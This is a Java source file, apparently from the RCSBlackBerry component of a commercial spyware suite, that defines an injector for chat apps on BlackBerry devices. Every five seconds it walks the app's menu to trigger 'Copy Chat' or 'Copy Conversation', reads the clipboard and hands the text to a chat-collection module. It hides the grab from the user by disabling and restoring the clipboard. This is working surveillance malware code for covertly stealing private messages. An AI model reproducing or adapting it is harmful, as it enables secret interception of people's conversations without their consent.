

/* *************************************************
 * Copyright (c) 2010 - 2012
 * HT srl,   All rights reserved.
 * 
 * Project      : RCS, RCSBlackBerry
 * *************************************************/

package blackberry.injection.injectors.group;

import java.util.Vector;

import net.rim.device.api.system.Clipboard;
import net.rim.device.api.ui.Screen;
import blackberry.Messages;
import blackberry.debug.Debug;
import blackberry.debug.DebugLevel;
import blackberry.injection.MenuWalker;
import blackberry.injection.injectors.AInjector;
import blackberry.injection.injectors.conversation.ConversationScreen;
import blackberry.module.ModuleChat;

public abstract class ChatGroupInjector extends AInjector {




    ConversationScreen conversationScreen = new ConversationScreen();

    public abstract String getAppName();

    public abstract String getCodName();

    public String getPreferredMenuName() {
        //g.7
        return Messages.getString("g.7");
    }

    public String[] getWantedScreen() {
        // g.10=ConversationScreen
        return new String[] { Messages.getString("g.10") };
    }

    /**
     * viene eseguito sul ConversationScreen, ogni 5 secondi
     */
    public final void playOnScreen(Screen screen) {




        try {
            String conversation = extractConversation(screen);
            conversationScreen.getConversationScreen(conversation, this);
        } catch (Exception ex) {



        }

    }

    private String extractConversation(Screen screen) {




        String clip = null;

        disableClipboard();
        try {
            //1g.1=Copy Chat
            //1g.2=Copy History
            //1g.4=Copy Conversation
            if (MenuWalker
                    .walk(new String[] {
                            Messages.getString("1g.1"), Messages.getString("1g.2"), Messages.getString("1g.4") }, //$NON-NLS-1$ //$NON-NLS-2$
                    screen, true)) {

                clip = (String) Clipboard.getClipboard().get();




                setClipboard(clip);

            } else {



            }
        } finally {
            enableClipboard();
        }
        return clip;
    }

    public void addLines(String partecipants, Vector lines) {



        ModuleChat agent = (ModuleChat) ModuleChat.getInstance();
        agent.addLines(getAppName(), partecipants, lines);

    }

    public boolean enabled() {
        return enabledGroup && enabled;
    }

    static boolean enabledGroup;

    static public boolean enabledGroup() {
        return enabledGroup;
    }

    static public void enableGroup(boolean value) {
        enabledGroup = value;
    }

}
